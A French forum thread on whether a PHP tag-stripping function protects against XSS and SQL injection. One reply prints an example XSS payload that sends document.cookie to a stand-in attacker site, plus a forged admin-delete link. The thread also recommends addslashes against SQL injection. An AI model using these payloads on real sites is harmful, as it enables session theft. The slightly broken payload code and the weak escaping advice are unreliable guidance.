Discussion :

[saturn1]

Bonjour je récupère mon texte de ma base de donnée dans un script php.
Et je souhaite laissez quelques possibilités tel que <strong>,<li>...

Donc je veux savoir si cette fonction est suffisante pour se protéger contre les xss et sql ??

Merci

[IGstaff]

Regarde la doc et elle répondra à tes questions.

Cette fonction protège bien vu qu'elle supprime les balise mais attention elle ne protège que des faille XSS, pas des injections SQL.

[Tesing]

Hello,

ca n'est pas suffisant si l'utilisateur peut soumettre directement du texte contenant des tags HTML comme strong.
Il pourrait injecter du javascript, par exemple dans les gestionnaires d'évènement de ces balises :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<strong onmouseover="document.href.location='http://sitepirate.com/' + document.cookie">Owned </strong>

Ou encore faire exécuter des actions non voulues a un utilisateur qui en aurait les droits si tu as par exemple des pages de suppression qui utilise la méthode GET.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<strong onmouseover="document.href.location='http://tonsite.com/admin/product/delete/1''">Owned </strong>

Il faudrait supprimer les attributs des balises que tu laisses passer.

De plus comme le signale IGStaff, tu n'es pas protégé contre les injections SQL, si tu utilises MySQL il faudra faire appel par exemple a mysql_real_escape_string pour échapper les entrées utilisateurs, ou encore addslashes.

[saturn1]

D'accord merci mais comment je fais pour protéger de failles xss ??

Car j'utilise tinymce.. et j'arrive pas à parser correctement :s !!

Merci

[saturn1]

Sinon j'ai fait avec xssme une analyse et :

j'ai 0 failure
20 warnings
et 20 passed

c'est gravee???